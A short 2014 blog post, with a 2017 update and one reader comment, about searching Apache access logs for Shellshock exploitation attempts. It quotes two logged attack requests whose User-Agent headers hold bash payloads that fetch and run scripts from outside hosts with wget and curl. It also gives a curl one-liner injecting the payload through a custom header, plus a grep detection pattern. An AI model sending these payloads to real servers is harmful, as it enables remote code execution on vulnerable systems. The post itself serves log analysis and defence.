Are there any shellshock attacks (in Apache access logs)?

Written by - 1 comments

Published on September 26th 2014 - Listed in Hacks Linux Shell


Yes, shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually used? Do people attack?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.

Update September 22nd 2017: Yes, I know: Kind of a late update. However it is worth to mention that the shellshock attack did work on http header level, too. So even if I couldn't find anything in the access logs (not all headers are logged here), that doesn't mean there were no shellshock-attacks. For example:

$ curl -H "X-Client-Something: Additional Header () { :;}; /bin/bash -c 'whoami'" https://www.example.com



Add a comment

Show form to leave a comment

Comments (newest first)

Alexander from Z├╝rich wrote on Sep 26th, 2014:

Easy way to grep:

grep -E '.*"\(' access_log